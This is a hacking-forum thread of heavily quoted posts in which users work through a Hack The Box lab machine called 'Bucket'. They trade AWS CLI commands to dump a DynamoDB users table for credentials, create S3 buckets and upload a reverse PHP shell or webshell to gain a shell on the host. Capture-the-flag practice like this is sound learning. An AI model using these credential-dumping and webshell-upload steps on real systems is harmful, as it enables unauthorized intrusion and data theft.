TUTORIAL Bucket Discussion
by Ro0ted - October 17, 2020 at 10:37 PM
#13
(October 18, 2020 at 11:10 AM)as12sd12fdg3 Wrote:
(October 18, 2020 at 10:15 AM)VillainD Wrote:
(October 18, 2020 at 10:04 AM)Ro0ted Wrote:
(October 18, 2020 at 09:51 AM)VillainD Wrote: aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/ | jq -r .

this will give u those creds

great man thank you. can you explain me the steps to find this command ?

first list all the tables using

aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/

https://docs.aws.amazon.com/cli/latest/r...l#examples

then i was searching to get those table contents and dynamodb has an option scan "The Scan operation returns one or more items and item attributes by accessing every item in a table or a secondary index"

https://docs.aws.amazon.com/cli/latest/r...l#examples

based on the examples i used this command since we already know the tables name

aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/

and the "--endpoint-url" i got it from here

https://stackoverflow.com/questions/6098...ing-tables
got this error
Unable to locate credentials. You can configure credentials by running "aws configure".
but i dont find any credentials

use these

AWS Access Key ID [None]: AKIAIOSFODNN7EXAMPLE
AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
Default region name [None]: us-west-2
Default output format [None]: json
Reply
#14
(October 18, 2020 at 11:31 AM)VillainD Wrote:
(October 18, 2020 at 11:10 AM)as12sd12fdg3 Wrote:
(October 18, 2020 at 10:15 AM)VillainD Wrote:
(October 18, 2020 at 10:04 AM)Ro0ted Wrote:
(October 18, 2020 at 09:51 AM)VillainD Wrote: aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/ | jq -r .

this will give u those creds

great man thank you. can you explain me the steps to find this command ?

first list all the tables using

aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/

https://docs.aws.amazon.com/cli/latest/r...l#examples

then i was searching to get those table contents and dynamodb has an option scan "The Scan operation returns one or more items and item attributes by accessing every item in a table or a secondary index"

https://docs.aws.amazon.com/cli/latest/r...l#examples

based on the examples i used this command since we already know the tables name

aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/

and the "--endpoint-url" i got it from here

https://stackoverflow.com/questions/6098...ing-tables
got this error
Unable to locate credentials. You can configure credentials by running "aws configure".
but i dont find any credentials

use these

AWS Access Key ID [None]: AKIAIOSFODNN7EXAMPLE
AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
Default region name [None]: us-west-2
Default output format [None]: json
Can u explain me where u find that coz im trying for 2 hours and found nothing, thanx for ur response 🙂
Reply
#15
(October 18, 2020 at 11:42 AM)as12sd12fdg3 Wrote:
(October 18, 2020 at 11:31 AM)VillainD Wrote:
(October 18, 2020 at 11:10 AM)as12sd12fdg3 Wrote:
(October 18, 2020 at 10:15 AM)VillainD Wrote:
(October 18, 2020 at 10:04 AM)Ro0ted Wrote: great man thank you. can you explain me the steps to find this command ?

first list all the tables using

aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/

https://docs.aws.amazon.com/cli/latest/r...l#examples

then i was searching to get those table contents and dynamodb has an option scan "The Scan operation returns one or more items and item attributes by accessing every item in a table or a secondary index"

https://docs.aws.amazon.com/cli/latest/r...l#examples

based on the examples i used this command since we already know the tables name

aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/

and the "--endpoint-url" i got it from here

https://stackoverflow.com/questions/6098...ing-tables
got this error
Unable to locate credentials. You can configure credentials by running "aws configure".
but i dont find any credentials

use these

AWS Access Key ID [None]: AKIAIOSFODNN7EXAMPLE
AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
Default region name [None]: us-west-2
Default output format [None]: json
Can u explain me where u find that coz im trying for 2 hours and found nothing, thanx for ur response 🙂

They are fake, you don't need real one.
The system is running the DynamoDB Local therefore you need just to pass any credential to work

see https://docs.aws.amazon.com/amazondynamo...nning.html

Happy Hacking! :)
Reply
#16
(October 18, 2020 at 11:08 AM)ARhOmOuTEd Wrote: you can upload files to the buckets

└─# aws --endpoint-url=http://s3.bucket.htb s3 cp ./myfile.txt s3://macz             
                                                       
you can reach the file over the url           
http://s3.bucket.htb/macz/myfile.txt

First you need to create a bucket :

> aws --endpoint-url=http://s3.bucket.htb s3api create-bucket --bucket ss3://NAMEOFBUCKET

Then you can list the buckets :

> aws --endpoint-url=http://s3.bucket.htb s3api list-buckets | jq .
or
> aws --endpoint-url=http://s3.bucket.htb s3 ls

And now you can upload here:
> aws --endpoint-url=http://s3.bucket.htb s3 cp ./MYFILE s3:/NAMEOFBUCKET
upload: ./MYFILE to s3://NAMEOFBUCKET/MYFILE

You can check now on http://s3.bucket.htb/NAMEOFBUCKET/MYFILE.
Reply
#17
(October 18, 2020 at 12:52 PM)xxxyz Wrote:
(October 18, 2020 at 11:08 AM)ARhOmOuTEd Wrote: you can upload files to the buckets

└─# aws --endpoint-url=http://s3.bucket.htb s3 cp ./myfile.txt s3://macz             
                                                       
you can reach the file over the url           
http://s3.bucket.htb/macz/myfile.txt

First you need to create a bucket :

> aws --endpoint-url=http://s3.bucket.htb s3api create-bucket --bucket ss3://NAMEOFBUCKET

Then you can list the buckets :

> aws --endpoint-url=http://s3.bucket.htb s3api list-buckets | jq .
or
> aws --endpoint-url=http://s3.bucket.htb s3 ls

And now you can upload here:
> aws --endpoint-url=http://s3.bucket.htb s3 cp ./MYFILE s3:/NAMEOFBUCKET
upload: ./MYFILE to s3://NAMEOFBUCKET/MYFILE

You can check now on http://s3.bucket.htb/NAMEOFBUCKET/MYFILE.

but, how can i get a shell on the server?
Reply
#18
(October 18, 2020 at 02:17 PM)ARhOmOuTEd Wrote:
(October 18, 2020 at 12:52 PM)xxxyz Wrote:
(October 18, 2020 at 11:08 AM)ARhOmOuTEd Wrote: you can upload files to the buckets

└─# aws --endpoint-url=http://s3.bucket.htb s3 cp ./myfile.txt s3://macz             
                                                       
you can reach the file over the url           
http://s3.bucket.htb/macz/myfile.txt

First you need to create a bucket :

> aws --endpoint-url=http://s3.bucket.htb s3api create-bucket --bucket ss3://NAMEOFBUCKET

Then you can list the buckets :

> aws --endpoint-url=http://s3.bucket.htb s3api list-buckets | jq .
or
> aws --endpoint-url=http://s3.bucket.htb s3 ls

And now you can upload here:
> aws --endpoint-url=http://s3.bucket.htb s3 cp ./MYFILE s3:/NAMEOFBUCKET
upload: ./MYFILE to s3://NAMEOFBUCKET/MYFILE

You can check now on http://s3.bucket.htb/NAMEOFBUCKET/MYFILE.

but, how can i get a shell on the server?

same issue ???????????????
Reply
#19
OK so 

we can see we can upload files to our bucket .

do the same for the adserver .We see it is there

[email protected]:/test# aws s3 cp test.txt s3://mimz --endpoint-url=http://s3.bucket.htb
upload: ./test.txt to s3://mimz/test.txt

Now we can upload a reverse php

aws s3 cp mimz.php s3://adserver --endpoint-url=http://s3.bucket.htb
upload: ./mimz.php to s3://adserver/mimz.php

I went to http://s3.bucket.htb/adserver/mimz.php to see it is there

then go to http://bucket.htb/mimz.php to trigger it
Reply
#20
(October 18, 2020 at 03:00 PM)chernakotka Wrote: OK so 

we can see we can upload files to our bucket .

do the same for the adserver .We see it is there

[email protected]:/test# aws s3 cp test.txt s3://mimz --endpoint-url=http://s3.bucket.htb
upload: ./test.txt to s3://mimz/test.txt

Now we can upload a reverse php

aws s3 cp mimz.php s3://adserver --endpoint-url=http://s3.bucket.htb
upload: ./mimz.php to s3://adserver/mimz.php

I went to http://s3.bucket.htb/adserver/mimz.php to see it is there

then go to http://bucket.htb/mimz.php to trigger it

no, you can't access the files from bucket.htb
only from s3.bucket.htb/adserver

(October 18, 2020 at 03:13 PM)ARhOmOuTEd Wrote:
(October 18, 2020 at 03:00 PM)chernakotka Wrote: OK so 

we can see we can upload files to our bucket .

do the same for the adserver .We see it is there

[email protected]:/test# aws s3 cp test.txt s3://mimz --endpoint-url=http://s3.bucket.htb
upload: ./test.txt to s3://mimz/test.txt

Now we can upload a reverse php

aws s3 cp mimz.php s3://adserver --endpoint-url=http://s3.bucket.htb
upload: ./mimz.php to s3://adserver/mimz.php

I went to http://s3.bucket.htb/adserver/mimz.php to see it is there

ok, it only works for some seconds

then go to http://bucket.htb/mimz.php to trigger it

no, you can't access the files from bucket.htb
only from s3.bucket.htb/adserver
Reply
#21
Any idea for the priv esc'part ? I have found that we are in docker. Nothing more.
Reply
#22
i can upload php file but its not executed, just downloaded, any idea ?

my command : aws --endpoint-url=http://s3.bucket.htb s3 cp ./webshell.php s3://adserver
Reply
#23
(October 18, 2020 at 03:39 PM)Ro0ted Wrote: i can upload php file but its not executed, just downloaded, any idea ?

my command : aws --endpoint-url=http://s3.bucket.htb s3 cp ./webshell.php s3://adserver

You need to trigger it.
 Go to http://bucket.htb/webshell.php
Reply
#24
(October 18, 2020 at 03:41 PM)xxxyz Wrote:
(October 18, 2020 at 03:39 PM)Ro0ted Wrote: i can upload php file but its not executed, just downloaded, any idea ?

my command : aws --endpoint-url=http://s3.bucket.htb s3 cp ./webshell.php s3://adserver

You need to trigger it.
 Go to http://bucket.htb/webshell.php

It say Not Found.
It is well in http://s3.bucket.htb/adserver/webshell.php but not in http://bucket.htb/webshell.php
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
TUTORIAL Luanne Tutorial/Discussion southerndarkness 33 4,265 December 01, 2020 at 09:07 PM
Last Post: tutyfruty
TUTORIAL Cereal.htb discussion (no tutorial) Kali76 24 3,200 December 01, 2020 at 05:29 PM
Last Post: Kali76
FLAG Bucket Commands to root y0ukn0wm3 5 1,510 November 30, 2020 at 03:28 PM
Last Post: y0ukn0wm3

 Users browsing this thread: 2 Guest(s)